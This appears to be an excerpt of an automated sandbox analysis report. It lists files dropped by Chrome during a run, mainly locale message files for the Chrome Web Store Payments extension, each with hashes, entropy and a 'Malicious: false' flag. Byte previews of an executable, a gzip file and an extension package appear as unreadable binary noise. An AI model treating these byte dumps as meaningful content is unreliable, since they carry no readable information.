Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......b............................&.... ........@.. ....................................`....................................J.......f............................................................................ ............... ..H............text...,.... ...................... ..`.rsrc...f...........................@..@.reloc..............................@..B........................H...........D.............................................................(b.....(b.....(b.....(b....0...........-.r...p.....r...p.....r...p.....r...p.....r...p.....r...p.....r...p.....r...p.....r...p.....r...p.....r...p.....r...p.....r...p.....r...p.....r...p.....r...p.....r...p.....r$..p.....r2..p.....r...p.....r...p......:%...r...p.....r...p.....r...p.........(c..."..(d......&...(e.....&...(f...*...0..z.......r...p+L+M+N+S+T,=+S.%......sg...+G+L.,P&.oh....1.r...p.o

C:\Users\user\AppData\Local\Temp\a6619414-df2f-4e65-a6b0-1393c31442b3.tmp

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT)
Category:	dropped
Size (bytes):	29066
Entropy (8bit):	7.991921788984723
Encrypted:	true
SSDEEP:
MD5:	DF9EFFA3926C4B16A9E3BE5B4C11985D
SHA1:	C8225B259FC188045647BF304FB45ECF85705F7D
SHA-256:	CC812B1135DF094ECDD5B6A29C9FF5E48079B0CED0AF94E133C5B32079A00894
SHA-512:	2CC9B14CB9362005406EEA8E23C22BAF530436201808C0A6AFC1E08B0B666609217EE5BE837B112E06FB8F0857EE4C881D0359A2FA7B2F5B8D40C8A66A7C8254
Malicious:	false
Reputation:	unknown
Preview:	...........}ks.G..w...l... ...6ey....DjI.....h...W`7..A.!....\|..AP...q&d..+.+_....#...}..+....L...8...ty#...u^.=q8..jT.B........x_J.OEu.....X.q>.......D..E"..N...~..<....U.I%.I&F.!M.e6.i..x38.^..4.......n.o....6.w..$..e)..H,......R...4/.,[.``...\|~#....v..ZK....t\.^...."..../.....I`.Rf8.....m~0!...a.b..Hn.g~...8T-.....%..`..g!.e....."..c..lM..J.,.y...[B(.e...y2...YW..ku.+z....Z...H..w..aQ$.....Ic...O.Y.....g....mR..U..+.T...80U.z9....g@P....Lo..YumZ....E.. ...]....l.%..'...'.}...\|H/.!.._'.1..j..le....{.#....{=89..._....N.0.B..$+.y.'....3...........^ok.ge%*.hx..g..@..^W<..]..<..........{.....F%...d.T._Z..........(.FCL..P.r.X.S9A`I.3....,.t.3.]......%......I.\.8......Kb...BB....D..."...2..."<..D..\|..+..w.._.y.....m@.Rl./..[9W.u..\...fH.j.F.1L......../N...d.......q....p..lp.@..95$z......^......'.O.d..cxu..<x=8........x1.....>.....u....(I....f$..(v..P.Y...J..gy.V.7_.,-.._A..E:I...0.....r....1X..........R.......Wp.4.@L......P....=0..t.....i.6.+:...E

C:\Users\user\AppData\Local\Temp\scoped_dir4584_1631448072\0e015237-2d24-4486-8640-8c9e7623d5ca.tmp

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Google Chrome extension, version 3
Category:	dropped
Size (bytes):	248531
Entropy (8bit):	7.963657412635355
Encrypted:	false
SSDEEP:
MD5:	541F52E24FE1EF9F8E12377A6CCAE0C0
SHA1:	189898BB2DCAE7D5A6057BC2D98B8B450AFAEBB6
SHA-256:	81E3A4D43A73699E1B7781723F56B8717175C536685C5450122B30789464AD82
SHA-512:	D779D78A15C5EFCA51EBD6B96A7CCB6D718741BDF7D9A37F53B2EB4B98AA1A78BC4CFA57D6E763AAB97276C8F9088940AC0476690D4D46023FF4BF52F3326C88
Malicious:	false
Reputation:	unknown
Preview:	Cr24..............0.."0....H.............0...........\7c.<........Fto.8.2'5..qk...%....2...C.F.9.#..e.xQ.......[...L\|....3>/....u.:T.7...(.yM...?V.<?........1.a...O?d.....A.H..'.MpB..T.m..Vn Ip..>k.\|1..n.<Fb..f..Q1.....s..2..{.6....Pp....obM..1.......b1.......(.u^.'z......v.F.W.X4."-eu...b.........\..F!...b...l5....zJ.q.......L].....w[T0.6....E.....r..%Z.vFm.9..5!,.~g5...;.t...']....+A.....u....k...e..&..l.6r[yU...%..f.......N..V.....<+.....l..}.{...z...)y.n..'..).....,.b....5.08K%..O.g..D.S.F5o..<(....>....\f..X..I..2."l...w....7f\|.~.c.4.E.......0..0....H............0.......).'..b.$w\$.q&.]zF_2..;...?.U,...W..L1.2...R..#....W.....c1k.$W..$.J....+M!.Hz.n`U.I)N.\|b.l....{.K@]6.LlP/....](.A..................I...).H....IQ.y.;MG.d..ix..#f.Z$\|..\|.?...0K...t"i..s...Y..%.Ky....0...{.!+.~v.;....J.....Z....).(6..@?v.;~..2..c....[0Y0....H.=.....H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...F0D. .0...\|!..A..L.+.=...kP.!.1..

C:\Users\user\AppData\Local\Temp\scoped_dir4584_1631448072\CRX_INSTALL\_locales\bg\messages.json

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	UTF-8 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	796
Entropy (8bit):	4.864931792423268
Encrypted:	false
SSDEEP:
MD5:	6F8E288A9AD5B1ED8633B430E2B4D4CA
SHA1:	F671D3D4BEFA431D1946D706F4192D44E29B6F08
SHA-256:	A114E2783D0E9B12155017323BA70838F0F82A71C7EE8DC1F115AE36991241F8
SHA-512:	0F87F3F0D115B872288949E59ACD3CD41B1FBC64A622D8FDA6D71FAFC5A900D92ADFBB0E7EB926F2A8759BBAA0896D48728FB719BBF5EF54AC21027328F7700C
Malicious:	false
Reputation:	unknown
Preview:	{.. "app_description": {.. "message": "........ . ... ........ .. Chrome".. },.. "app_name": {.. "message": "........ . ... ........ .. Chrome".. },.. "craw_app_unavailable": {.. "message": "........... .... ...... .. .............".. },.. "craw_connect_to_network": {.. "message": "...., ........ .. . ......".. },.. "iap_unavailable": {.. "message": "........... .... ...... .. .......... ....... .. .........".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "...., ...... . Chrome.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir4584_1631448072\CRX_INSTALL\_locales\ca\messages.json

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	UTF-8 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	675
Entropy (8bit):	4.536753193530313
Encrypted:	false
SSDEEP:
MD5:	1FDAFC926391BD580B655FBAF46ED260
SHA1:	C95743C3F43B2B099FEBEBC5BD850F0C20E820AC
SHA-256:	C67898B67F9C9209EAFDA6532B62D5789863CFB855998DD6A70E7775316CEC20
SHA-512:	39D95D45C5746DA3BAA7AE6A3344EA17D7A7C3569C2A56959FF119261DA08C747A320FCF701AC72B8DBDBF8BF06FD8B239017A282CDDA444F3826D4EC672CBB4
Malicious:	false
Reputation:	unknown
Preview:	{.. "app_description": {.. "message": "Sistema de pagaments de Chrome Web Store".. },.. "app_name": {.. "message": "Sistema de pagaments de Chrome Web Store".. },.. "craw_app_unavailable": {.. "message": "Ara mateix aquesta aplicaci. no est. disponible.".. },.. "craw_connect_to_network": {.. "message": "Connecteu-vos a una xarxa.".. },.. "iap_unavailable": {.. "message": "La funci. Pagaments a l'aplicaci. no est. disponible actualment.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Inicieu la sessi. a Chrome.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir4584_1631448072\CRX_INSTALL\_locales\cs\messages.json

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	UTF-8 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	641
Entropy (8bit):	4.698608127109193
Encrypted:	false
SSDEEP:
MD5:	76DEC64ED1556180B452A13C83171883
SHA1:	CFB1E56FD587BCDC459C1D9A683B71F9849058F9
SHA-256:	32290D69A90E6BAAC428B10382C99221B12773BB9A184F3B93DFB48A4F6D7A40
SHA-512:	5230A217968D5DC463E2E92D704544311A721E5CEF65C3125CBD8DEB9C0293D3BFB5C820A6011ABF77095FDEE7DAF67D541DC202B0C9CDB0908CBB85D84885CB
Malicious:	false
Reputation:	unknown
Preview:	{.. "app_description": {.. "message": "Platby Internetov.ho obchodu Chrome".. },.. "app_name": {.. "message": "Platby Internetov.ho obchodu Chrome".. },.. "craw_app_unavailable": {.. "message": "Aplikace v sou.asn. dob. nen. dostupn..".. },.. "craw_connect_to_network": {.. "message": "P.ipojte se pros.m k s.ti.".. },.. "iap_unavailable": {.. "message": "Platby v aplikaci aktu.ln. nejsou k dispozici.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "P.ihlaste se do Chromu.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir4584_1631448072\CRX_INSTALL\_locales\da\messages.json

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	UTF-8 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	624
Entropy (8bit):	4.5289746475384565
Encrypted:	false
SSDEEP:
MD5:	238B97A36E411E42FF37CEFAF2927ED1
SHA1:	4E47AC90BA24C8F4724D9293FA40CFD4ADA66FE0
SHA-256:	4977D4A053542FF66967FAED6B06585DD70E68E20BFEB533B66FE3287F9655D9
SHA-512:	FD0742D47B5F5AB9AAD9B4C3D57F63CB693E060EECE123A72036C6E92156D099495C7E9E9CC6DC83EEBCDDCC4B4C81FB47E4C9559DA3EBA024780FFF10C53E0A
Malicious:	false
Reputation:	unknown
Preview:	{.. "app_description": {.. "message": "Betalinger i Chrome Webshop".. },.. "app_name": {.. "message": "Betalinger i Chrome Webshop".. },.. "craw_app_unavailable": {.. "message": "Appen er ikke tilg.ngelig i .jeblikket.".. },.. "craw_connect_to_network": {.. "message": "Opret forbindelse til et netv.rk.".. },.. "iap_unavailable": {.. "message": "Betaling i appen er ikke tilg.ngelig i .jeblikket.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Log ind p. Chrome.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir4584_1631448072\CRX_INSTALL\_locales\de\messages.json

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	UTF-8 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	651
Entropy (8bit):	4.583694000020627
Encrypted:	false
SSDEEP:
MD5:	6B3E916E8C1991AA0453CBA00FEDCAAA
SHA1:	D6366D15912E40CA107FD42BFE9579C3336A51F9
SHA-256:	A62FFAB910E31531758EEE48B2CC71A8857BEC3021DEAD50B668CBA3C8667053
SHA-512:	87EA4311B61F29543B13F3E17DFA919D0C320B4FE370CC152E0B1514BCA79B0ABB526DDCF08621D6EBFA48923EE8FB4C667EFB120A72BD9583EEBEE7BFB80552
Malicious:	false
Reputation:	unknown
Preview:	{.. "app_description": {.. "message": "Chrome Web Store-Zahlungen".. },.. "app_name": {.. "message": "Chrome Web Store-Zahlungen".. },.. "craw_app_unavailable": {.. "message": "Die App ist momentan nicht verf.gbar.".. },.. "craw_connect_to_network": {.. "message": "Bitte stellen Sie eine Verbindung zu einem Netzwerk her.".. },.. "iap_unavailable": {.. "message": "In-App-Zahlungen sind momentan nicht m.glich.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Bitte melden Sie sich in Chrome an.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir4584_1631448072\CRX_INSTALL\_locales\el\messages.json

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	UTF-8 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	787
Entropy (8bit):	4.973349962793468
Encrypted:	false
SSDEEP:
MD5:	05C437A322C1148B5F78B2F341339147
SHA1:	AB53003A678E44A170E73711FBD9949833BBF3AA
SHA-256:	A052C32B4FCAC61152EB0ADB2C260FB6A8256AD104AA0013DB93E9798D41A070
SHA-512:	C36CB9202A34356DD06D377E2A088F428D0B8EBE7D2E54F8380485E9D94A0598D7F651C1E7A2FD55BE481D49C02B0812F2BA335E08611EC85EE0BD60784A6B40
Malicious:	false
Reputation:	unknown
Preview:	{.. "app_description": {.. "message": "........ ... Chrome Web Store".. },.. "app_name": {.. "message": "........ ... Chrome Web Store".. },.. "craw_app_unavailable": {.. "message": ". ........ .... .. ..... ... ..... ..........".. },.. "craw_connect_to_network": {.. "message": ".......... .. ... .......".. },.. "iap_unavailable": {.. "message": ".. ........ ..... ......... ... ..... ..... .. ...... ...........".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": ".......... ... Chrome.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir4584_1631448072\CRX_INSTALL\_locales\en\messages.json

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	593
Entropy (8bit):	4.483686991119526
Encrypted:	false
SSDEEP:
MD5:	91F5BC87FD478A007EC68C4E8ADF11AC
SHA1:	D07DD49E4EF3B36DAD7D038B7E999AE850C5BEF6
SHA-256:	92F1246C21DD5FD7266EBFD65798C61E403D01A816CC3CF780DB5C8AA2E3D9C9
SHA-512:	FDC2A29B04E67DDBBD8FB6E8D2443E46BADCB2B2FB3A850BBD6198CDCCC32EE0BD8A9769D929FEEFE84D1015145E6664AB5FEA114DF5A864CF963BF98A65FFD9
Malicious:	false
Reputation:	unknown
Preview:	{.. "app_description": {.. "message": "Chrome Web Store Payments".. },.. "app_name": {.. "message": "Chrome Web Store Payments".. },.. "craw_app_unavailable": {.. "message": "App currently unavailable.".. },.. "craw_connect_to_network": {.. "message": "Please connect to a network.".. },.. "iap_unavailable": {.. "message": "In-App Payments is currently unavailable.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Please sign into Chrome.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir4584_1631448072\CRX_INSTALL\_locales\en_GB\messages.json

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	593
Entropy (8bit):	4.483686991119526
Encrypted:	false
SSDEEP:
MD5:	91F5BC87FD478A007EC68C4E8ADF11AC
SHA1:	D07DD49E4EF3B36DAD7D038B7E999AE850C5BEF6
SHA-256:	92F1246C21DD5FD7266EBFD65798C61E403D01A816CC3CF780DB5C8AA2E3D9C9
SHA-512:	FDC2A29B04E67DDBBD8FB6E8D2443E46BADCB2B2FB3A850BBD6198CDCCC32EE0BD8A9769D929FEEFE84D1015145E6664AB5FEA114DF5A864CF963BF98A65FFD9
Malicious:	false
Reputation:	unknown
Preview:	{.. "app_description": {.. "message": "Chrome Web Store Payments".. },.. "app_name": {.. "message": "Chrome Web Store Payments".. },.. "craw_app_unavailable": {.. "message": "App currently unavailable.".. },.. "craw_connect_to_network": {.. "message": "Please connect to a network.".. },.. "iap_unavailable": {.. "message": "In-App Payments is currently unavailable.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Please sign into Chrome.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir4584_1631448072\CRX_INSTALL\_locales\es\messages.json

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	UTF-8 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	661
Entropy (8bit):	4.450938335136508
Encrypted:	false
SSDEEP:
MD5:	82719BD3999AD66193A9B0BB525F97CD
SHA1:	41194D511F1ACC16C1CA828AC81C18C8C6B47287
SHA-256:	4DB9B2721E625C18B9E05C04B31AF5D9694712F1CAAF6219ABE34BB08E5DB1C7
SHA-512:	D4C49B43427799B6292CEED11CACB1D76F7CE43EBF402B43B638A6EB2B414ED0981E386CB8CDF0B51D1BD9552934FE25B2F6392266BB73D8C9A691F65BCE0128
Malicious:	false
Reputation:	unknown
Preview:	{.. "app_description": {.. "message": "Sistema de pagos de Chrome Web Store".. },.. "app_name": {.. "message": "Sistema de pagos de Chrome Web Store".. },.. "craw_app_unavailable": {.. "message": "Esta aplicaci.n no est. disponible en este momento.".. },.. "craw_connect_to_network": {.. "message": "Con.ctate a una red.".. },.. "iap_unavailable": {.. "message": "Los pagos en la aplicaci.n no est.n disponibles en este momento.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Inicia sesi.n en Chrome.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir4584_1631448072\CRX_INSTALL\_locales\es_419\messages.json

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	UTF-8 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	637
Entropy (8bit):	4.47253983486615
Encrypted:	false
SSDEEP:
MD5:	6B2583D8D1C147E36A69A88009CBEBC7
SHA1:	4D4DEEB4BE6AA0181825F3371A761ABC5B4D5937
SHA-256:	6659BC3705311D7641A73995DCFEA80C7734F2F4EBBC3787B3892A240348324F
SHA-512:	37F0DBFCC1B5A2B8E4C92C49D2D9DEEF25616421350324F57E0149A45A6CCB437F5E3CBE97412C4B5DBBF2593783C7DF71E9C25A851AEAE6E4764C545723FA53
Malicious:	false
Reputation:	unknown
Preview:	{.. "app_description": {.. "message": "Sistema de pagos de Chrome Web Store".. },.. "app_name": {.. "message": "Sistema de pagos de Chrome Web Store".. },.. "craw_app_unavailable": {.. "message": "Esta aplicaci.n no est. disponible en este momento.".. },.. "craw_connect_to_network": {.. "message": "Con.ctate a una red.".. },.. "iap_unavailable": {.. "message": "En este momento, Pagos En-Apps no est. disponible.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Accede a Chrome.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir4584_1631448072\CRX_INSTALL\_locales\et\messages.json

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	UTF-8 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	595
Entropy (8bit):	4.467205425399467
Encrypted:	false
SSDEEP:
MD5:	CFF6CB76EC724B17C1BC920726CB35A7
SHA1:	14ED068251D65A840F00C05409D705259D329FFC
SHA-256:	C85800BF45942FCC7FD6B1DF929C25F9CC2A977A6678966BD03D4B6B69889AFD
SHA-512:	53D7D01BB30C0306DE65A79FD9551D2E8C1F71F4F45F71906B009071CB3E0F231E6A50FDD78773E9B4DE94085BC7B97F829842FA21A89A2080D33458B745C46F
Malicious:	false
Reputation:	unknown
Preview:	{.. "app_description": {.. "message": "Chrome'i veebipoe maksed".. },.. "app_name": {.. "message": "Chrome'i veebipoe maksed".. },.. "craw_app_unavailable": {.. "message": "Rakendus pole praegu saadaval.".. },.. "craw_connect_to_network": {.. "message": "Looge .hendus v.rguga.".. },.. "iap_unavailable": {.. "message": "Rakendusesisesed maksed ei ole praegu saadaval.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Logige Chrome'i sisse.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir4584_1631448072\CRX_INSTALL\_locales\fi\messages.json

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	UTF-8 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	647
Entropy (8bit):	4.595421267152647
Encrypted:	false
SSDEEP:
MD5:	3A01FEE829445C482D1721FF63153D16
SHA1:	F3EAAADDC03F943FC88B30B67F534AA13E3336DD
SHA-256:	0BDE54B20845124113383B6EB81E43A0F05E4EB0C44BEE3C1DFAC4CC5FEC2836
SHA-512:	3B92B6C86D30FD36AA3CEFF8773BA60C3FC5CC19C693540137044C5838A5503895C770C0336A4D0A3DB5E42F3FB36274D8D3F85B9DCA2F3EC0E974FDDB0BEAD8
Malicious:	false
Reputation:	unknown
Preview:	{.. "app_description": {.. "message": "Chrome Web Storen maksut".. },.. "app_name": {.. "message": "Chrome Web Storen maksut".. },.. "craw_app_unavailable": {.. "message": "Sovellus ei ole t.ll. hetkell. k.ytett.viss..".. },.. "craw_connect_to_network": {.. "message": "Muodosta verkkoyhteys.".. },.. "iap_unavailable": {.. "message": "Sovelluksen sis.iset maksut eiv.t ole t.ll. hetkell. k.ytett.viss..".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Kirjaudu sis..n Chromeen.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir4584_1631448072\CRX_INSTALL\_locales\fil\messages.json

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	658
Entropy (8bit):	4.5231229502550745
Encrypted:	false
SSDEEP:
MD5:	57AF5B654270A945BDA8053A83353A06
SHA1:	EEEF7A4F869F97CF471A05D345E74F982D15E167
SHA-256:	EC002ED92359F67818B49455DFC579E140368E6A004080AF022FD4F57F6B03F2
SHA-512:	5F0AE839FCF3F4EA48FF41A76655AE0F3821564AFD5D42FBB9FBB9A38E8D8F7BB5E9B6F71064588CD441261F644095A44A755C134CE546D506D9A21E488BAF52
Malicious:	false
Reputation:	unknown
Preview:	{.. "app_description": {.. "message": "Mga Pagbabayad sa Chrome Web Store".. },.. "app_name": {.. "message": "Mga Pagbabayad sa Chrome Web Store".. },.. "craw_app_unavailable": {.. "message": "Kasalukuyang hindi available ang app.".. },.. "craw_connect_to_network": {.. "message": "Mangyaring kumonekta sa isang network.".. },.. "iap_unavailable": {.. "message": "Kasalukuyang hindi available ang Mga Pagbabayad na In-App.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Mangyaring mag-sign in sa Chrome.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir4584_1631448072\CRX_INSTALL\_locales\fr\messages.json

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	UTF-8 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	677
Entropy (8bit):	4.552569602149629
Encrypted:	false
SSDEEP:
MD5:	8D11C90F44A6585B57B933AB38D1FFF8
SHA1:	3F9D44EA8807069A32AACA2AAAD02FD892E6CC90
SHA-256:	599491F8C52B945C16C441ADF45BFD45AFAE046DA07757D97C56AF4DE75ED3B5
SHA-512:	D7EF7F5AD7EF1A1595825D79B69E2B1E988AD3CF1F3881496FCCD30F241E4E9C6E457F9F5D0F855DE3536DB7A40C3E1C55946B50D3F556F4A35285066A0CD6F7
Malicious:	false
Reputation:	unknown
Preview:	{.. "app_description": {.. "message": "Paiements via le Chrome.Web.Store".. },.. "app_name": {.. "message": "Paiements via le Chrome.Web.Store".. },.. "craw_app_unavailable": {.. "message": "Application indisponible pour le moment.".. },.. "craw_connect_to_network": {.. "message": "Veuillez vous connecter . un r.seau.".. },.. "iap_unavailable": {.. "message": "Les paiements via l'application ne sont pas disponibles pour le moment.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Veuillez vous connecter . Chrome.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir4584_1631448072\CRX_INSTALL\_locales\hi\messages.json

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	UTF-8 Unicode text, with CRLF line terminators
Category:	modified
Size (bytes):	835
Entropy (8bit):	4.791154467711985
Encrypted:	false
SSDEEP:
MD5:	E376D757C8FD66AC70A7D2D49760B94E
SHA1:	1525C5B1312D409604F097768503298EC440CC4D
SHA-256:	8106D98C4F8DA16DB698444409558E29CC96735E188BFA303C333A5D99231C1D
SHA-512:	673F3F259AF2946E4F49BBED14A2A70D44BF9FDA9D7A71DC9172BA9B7B3C7F7062B16D29682B638D485B0520ED6F99E7A735F28C7C719B539559005B69FA7555
Malicious:	false
Reputation:	unknown
Preview:	{.. "app_description": {.. "message": "Chrome ... ..... ......".. },.. "app_name": {.. "message": "Chrome ... ..... ......".. },.. "craw_app_unavailable": {.. "message": "......... .. ... ...... .... ...".. },.. "craw_connect_to_network": {.. "message": "..... ....... .. ...... .....".. },.. "iap_unavailable": {.. "message": "..-.. ...... ... ...... .... ...".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "..... Chrome ... .... .. .....".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir4584_1631448072\CRX_INSTALL\_locales\hr\messages.json

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines
Category:	dropped
Size (bytes):	503
Entropy (8bit):	4.819520019697578
Encrypted:	false
SSDEEP:
MD5:	9CF848209FF50DBF68F5292B3421831C
SHA1:	D29880B7B15102469123D8747BF645706CE8595B
SHA-256:	EA1744C3CFBAA684A31A00067E8493ED114EFF3E878C797C9C55A7B122D855CD
SHA-512:	B784AEE4926F850F30072ABDA85E2E2E3966285F14BDF647BD2A41C5C06CAB04BC962584830E4E913896010396EAD02D90528235B9D9EDA1BDEFBFBB5333EDF5
Malicious:	false
Reputation:	unknown
Preview:	{"craw_app_unavailable":{"message":"Aplikacija trenuta\u010dno nije dostupna."},"craw_connect_to_network":{"message":"Pove\u017eite se s mre\u017eom."},"app_name":{"message":"Pla\u0107anja u web-trgovini Chrome"},"app_description":{"message":"Pla\u0107anja u web-trgovini Chrome"},"iap_unavailable":{"message":"Pla\u0107anje u aplikaciji trenuta\u010dno nije dostupno."},"please_sign_in":{"message":"Prijavite se na Chrome."},"jwt_retrieve_failed":{"message":"The transaction could not be completed."}}.

C:\Users\user\AppData\Local\Temp\scoped_dir4584_1631448072\CRX_INSTALL\_locales\hu\messages.json

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines
Category:	dropped
Size (bytes):	612
Entropy (8bit):	4.865151680865773
Encrypted:	false
SSDEEP:
MD5:	4AD92AFDE3408FBBE43B0C3C71677650
SHA1:	3488901077F336A3196F9AE116E36DF1674E1ACA
SHA-256:	61258FE04C23AE14FDC99EE846CEA71CC703990CC0F80C3934299646E86C475E
SHA-512:	EB945FA455DEB9D70033DC0A8AA55D1F47AA00214B70AD34D5419A54F9C05B267F96F9785139F452BEE6972376DDF13EE51C681845A2B0818172FB75BA1FD093
Malicious:	false
Reputation:	unknown
Preview:	{"craw_app_unavailable":{"message":"Az alkalmaz\u00e1s jelenleg nem \u00e9rhet\u0151 el."},"craw_connect_to_network":{"message":"K\u00e9rj\u00fck, csatlakozzon egy h\u00e1l\u00f3zathoz."},"app_name":{"message":"Chrome Internetes \u00e1ruh\u00e1z Fizet\u00e9si rendszere"},"app_description":{"message":"Chrome Internetes \u00e1ruh\u00e1z Fizet\u00e9si rendszere"},"iap_unavailable":{"message":"Az alkalmaz\u00e1son bel\u00fcli fizet\u00e9s jelenleg nem \u00e9rhet\u0151 el."},"please_sign_in":{"message":"Jelentkezzen be a Chrome-ba."},"jwt_retrieve_failed":{"message":"The transaction could not be completed."}}.

C:\Users\user\AppData\Local\Temp\scoped_dir4584_1631448072\CRX_INSTALL\_locales\id\messages.json

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines
Category:	dropped
Size (bytes):	461
Entropy (8bit):	4.642271834875684
Encrypted:	false
SSDEEP:
MD5:	9008516AA1D8F8C2B8ECE70B7E4963AD
SHA1:	EA7AD4BE77A80A4B9FB1E59A340010830E494747
SHA-256:	89CAB0AF2B53C6ABEB93C8C628DDCBDD286A7A2672FE03440411BB654E3A0675
SHA-512:	46534829417CAD54310BA90AD4545918A2E934508E0CC3467E367944E52315B1BC6500119214EABD40D641DD167C077935436135AF1C0DB1D1007AE98E6175FC
Malicious:	false
Reputation:	unknown
Preview:	{"craw_app_unavailable":{"message":"Aplikasi tidak tersedia saat ini."},"craw_connect_to_network":{"message":"Sambungkan ke jaringan."},"app_name":{"message":"Pembayaran Chrome Webstore"},"app_description":{"message":"Pembayaran Chrome Webstore"},"iap_unavailable":{"message":"Pembayaran Dalam Aplikasi saat ini tidak tersedia."},"please_sign_in":{"message":"Harap masuk ke Chrome."},"jwt_retrieve_failed":{"message":"The transaction could not be completed."}}.

C:\Users\user\AppData\Local\Temp\scoped_dir4584_1631448072\CRX_INSTALL\_locales\it\messages.json

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines
Category:	dropped
Size (bytes):	464
Entropy (8bit):	4.701550173628233
Encrypted:	false
SSDEEP:
MD5:	BB9C32BA62DDA02F9471C64B5F9CF916
SHA1:	9825037D5D9185C58456CDD887C77B10A41D8C84
SHA-256:	43A0B113D3773BA78F82BB9E42DDC46F6892D0FBBB351F94A7C105E4A146E9C1
SHA-512:	4D3DB91A6251F2DD9CBF97D29805A7AC23F49988966E9B686D486B4A8CEBEA33F5502E3891D5231674061127C282C745FB87FDA7467A6172851BF6925506C8CA
Malicious:	false
Reputation:	unknown
Preview:	{"craw_app_unavailable":{"message":"App al momento non disponibile."},"craw_connect_to_network":{"message":"Collegati a una rete."},"app_name":{"message":"Pagamenti Chrome Web Store"},"app_description":{"message":"Pagamenti Chrome Web Store"},"iap_unavailable":{"message":"La funzione Pagamenti In-App non \u00e8 al momento disponibile."},"please_sign_in":{"message":"Accedi a Chrome."},"jwt_retrieve_failed":{"message":"The transaction could not be completed."}}.

C:\Users\user\AppData\Local\Temp\scoped_dir4584_1631448072\CRX_INSTALL\_locales\ja\messages.json

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines
Category:	dropped
Size (bytes):	806
Entropy (8bit):	4.671841695172103
Encrypted:	false
